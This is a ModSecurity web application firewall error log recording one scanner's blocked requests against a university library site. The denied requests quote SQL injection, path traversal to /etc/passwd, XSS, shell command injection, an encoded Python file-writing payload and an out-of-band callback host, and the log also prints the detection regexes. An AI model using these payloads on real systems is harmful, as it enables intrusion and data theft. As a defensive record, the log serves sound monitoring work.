[Tue Aug 29 11:35:12.318134 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAARdiUEAAAAK"]
[Tue Aug 29 11:35:12.361620 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAPLwLEAAAAX"]
[Tue Aug 29 11:35:12.470037 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVPX3wAAAAF"]
[Tue Aug 29 11:35:12.670204 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVPX3wAAAAF"]
[Tue Aug 29 11:35:13.417873 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAVoB-4AAAAY"]
[Tue Aug 29 11:35:14.296376 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAVWQAYAAAAV"]
[Tue Aug 29 11:35:14.374952 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAATWYTcAAAAa"]
[Tue Aug 29 11:35:16.244559 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASEJZYAAAAE"]
[Tue Aug 29 11:35:16.345889 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAATfd5MAAAAk"]
[Tue Aug 29 11:35:16.398909 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATavwcAAAAg"]
[Tue Aug 29 11:35:16.401371 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAATxvZsAAAAw"]
[Tue Aug 29 11:35:18.449623 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAATPtUkAAAAM"]
[Tue Aug 29 11:35:18.729687 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAATOA-oAAAAH"]
[Tue Aug 29 11:35:19.305277 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAVoCAkAAAAY"]
[Tue Aug 29 11:35:20.444538 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11iMCo-f0AAASOUrYAAAAR"]
[Tue Aug 29 11:35:21.352101 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAVr@R4AAAAZ"]
[Tue Aug 29 11:35:22.350718 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAASOUrkAAAAR"]
[Tue Aug 29 11:35:23.377307 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAAT2JTMAAAAz"]
[Tue Aug 29 11:35:24.300208 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAVK0LAAAAAB"]
[Tue Aug 29 11:35:24.332550 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jMCo-f0AAAVr@SMAAAAZ"]
[Tue Aug 29 11:35:25.327445 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAASI0GkAAAAG"]
[Tue Aug 29 11:35:26.360426 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAPDoS8AAAAP"]
[Tue Aug 29 11:35:27.317837 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAN5YIkAAAAN"]
[Tue Aug 29 11:35:27.340786 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVmuMEAAAAT"]
[Tue Aug 29 11:35:28.300994 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAUOaXUAAABG"]
[Tue Aug 29 11:35:29.305319 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAVRxfQAAAAQ"]
[Tue Aug 29 11:35:29.324907 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVsUcwAAAAb"]
[Tue Aug 29 11:35:30.297297 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAVoCB0AAAAY"]
[Tue Aug 29 11:35:31.391884 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11k8Co-f0AAAN5YJIAAAAN"]
[Tue Aug 29 11:35:32.309544 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAUDQVwAAAA7"]
[Tue Aug 29 11:35:32.315123 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAATge@wAAAAl"]
